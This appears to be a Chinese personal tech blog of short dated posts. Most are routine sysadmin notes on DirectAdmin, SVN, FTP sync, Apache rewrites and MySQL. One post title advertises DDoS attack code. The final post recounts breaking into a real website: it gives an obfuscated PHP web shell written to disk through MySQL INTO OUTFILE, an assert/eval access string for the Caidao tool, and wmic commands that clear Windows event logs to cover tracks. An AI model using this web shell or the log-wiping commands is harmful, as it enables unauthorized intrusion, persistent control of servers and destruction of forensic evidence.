24 201201

清空DirectAdmin短信息

cat /dev/null >/usr/local/directadmin/data/admin/tickets.list
rm -rf /usr/local/directadmin/data/tickets/*

24 201201

服务器上SVN CHECKOUT步骤

网络生活 TAGS: , NO COMMENTS

svn checkout SVN源地址 目标路径
cd 目标路径
find . -type d -name ".svn"|xargs rm -rf
chown -R 要更改拥有者的名称 目标路径

19 201201

使用Curlftpfs+Unison实现本地目录与FTP间双向同步

双向同步
rpm -Uhv http://apt.sw.be/redhat/el5/en/x86_64/rpmforge/RPMS//rpmforge-release-0.3.6-1.el5.rf.x86_64.rpm
yum install curlftpfs
make ftp_test
curlftpfs ftp://IP_ADDRESS/test/ /home/yemaoshen/ftp_test/ -o user="yemaosheng:com" -o allow_other
make local_test
yum install unison
unison ./ftp_test ./local_test -auto -silent

Read More »

17 201201

Windows下的定时URL请求访问工具UrlCron

转自:http://www.hostloc.com/thread-43370-1-1.html
运行环境:Windows .Net Framework SP1
以系统服务方式自动运行,无需登陆手动执行
支持具体到秒级的cron定时URL请求
自动采集及网站后台自动任务必备的工具
---------
文件清单:
install.bat  安装,将UrlCron服务安装到系统Servcie服务中,运行on.bat可马上执行
on.bat    手动启动服务
off.bat    手动停止服务
uninstall.bat 卸载,从服务中删除UrlCron服务
cron.log   记录运行日志及请求错误记录
---------
cron.ini   需要请求的URL清单配置,配置格式:时间(秒) 空格 Url地址,一行为一个任务线程urlcron-v1.0.zip

17 201201

二级域名映射rewrite - apache

网上看到的,感觉不错,就先cp下来了
RewriteEngine on
RewriteCond   %{HTTP_HOST}                 ^[^.]+\.site\.com$
RewriteRule   ^(.+)                        %{HTTP_HOST}$1          [C]
RewriteRule   ^([^.]+)\.site\.com(.*)   http://www.site.com/$1$2

17 201201

mysql alter 操作

网络生活 TAGS: , NO COMMENTS

转自:http://www.sablog.net/blog/archives/551/
//主键

alter table tabelname add new_field_id int(5) unsigned default 0 not null auto_increment ,add primary key (new_field_id);

//增加一个新列

alter table t2 add d timestamp;
alter table infos add ex tinyint not null default '0';

Read More »

17 201201

PHPDDOS的UDP攻击,TCP攻击,和CC攻击的核心代码

网络生活 TAGS: ,, NO COMMENTS

CC攻击模块

Read More »

17 201201

好吧,记录一下我获得一家网站shell权限的过程吧

首先拿到mysql的root帐号和密码,然后破解了phpmyadmin路径
然后进去用了一些办法,首先
创建一个表
create table tmp(str TEXT);
然后写PHP一句话
insert into tmp values("<?");
insert into tmp values("$_=\"\";");
insert into tmp values("$_[+\"\"]='';");
insert into tmp values("$_=\"$_\".\"\";");
insert into tmp values('$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");');
insert into tmp values("?>");
insert into tmp values("<?=${'_'.$_}['_'](${'_'.$_}['__']);?>");
好,然后通过X2的UC来爆路径,访问xxxx/uc_server/control/admin/db.php
然后生成一句话文件
select * from tmp into outfile "d:\\xx\\xx\\onesentence.php";
然后用菜刀工具http://www.maicaidao.com/
caidao-20111116.zip
添加这个站点时,地址就是文件的访问地址/onesentence.php?_=assert&__=eval($_POST['pass']),密码是pass
然后就可以用这个来控制机器咯,嗯.
忽然发现我竟然做了一次HACKER,难以置信了,嗯.
吐槽:不过违法的事还是少做吧,嗯...
擦屁股,清空日志:
cmd命令如下,用PHP后门来处理
wmic nteventlog where (description like \"%secevent%\") call cleareventlog
wmic nteventlog where (description like \"%sysevent%\") call cleareventlog
wmic nteventlog where (description like \"%appevent%\") call cleareventlog